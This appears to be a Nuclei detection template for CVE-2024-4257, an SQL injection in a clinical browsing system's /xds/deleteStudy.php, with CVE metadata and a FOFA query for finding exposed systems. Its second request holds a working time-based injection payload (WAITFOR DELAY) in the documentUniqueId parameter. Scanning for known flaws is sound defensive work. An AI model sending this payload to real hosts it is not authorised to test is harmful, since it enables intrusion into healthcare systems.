A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.
PoC代码[已公开]
id: CVE-2024-4257
info:
name: BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection
author: s4e-io
severity: medium
description: |
A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-4257
- https://github.com/GAO-UNO/cve/blob/main/sql.md
- https://vuldb.com/?submit.321338
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
cvss-score: 6.3
cve-id: CVE-2024-4257
cwe-id: CWE-89
epss-score: 0.91919
epss-percentile: 0.99685
metadata:
verified: true
max-request: 1
fofa-query: app="LANWON-临床浏览系统"
tags: time-based-sqli,cve,cve2024,sqli,blunet
flow: http(1) && http(2)
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>临床浏览</title>")'
- 'contains(header,"text/html")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
@timeout 20s
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- 'contains(header,"text/html")'
- "status_code == 200"
condition: and
# digest: 4a0a004730450221009d87880667c415e0236553bc6e07f16db518a6843e73dd8af0bcc836d35145ef022055a61ad1d63a6817b74c427f83b83983085db0aa5cb289ac521fb7508aeb63d8:922c64590222798bb761d5b6d8e72950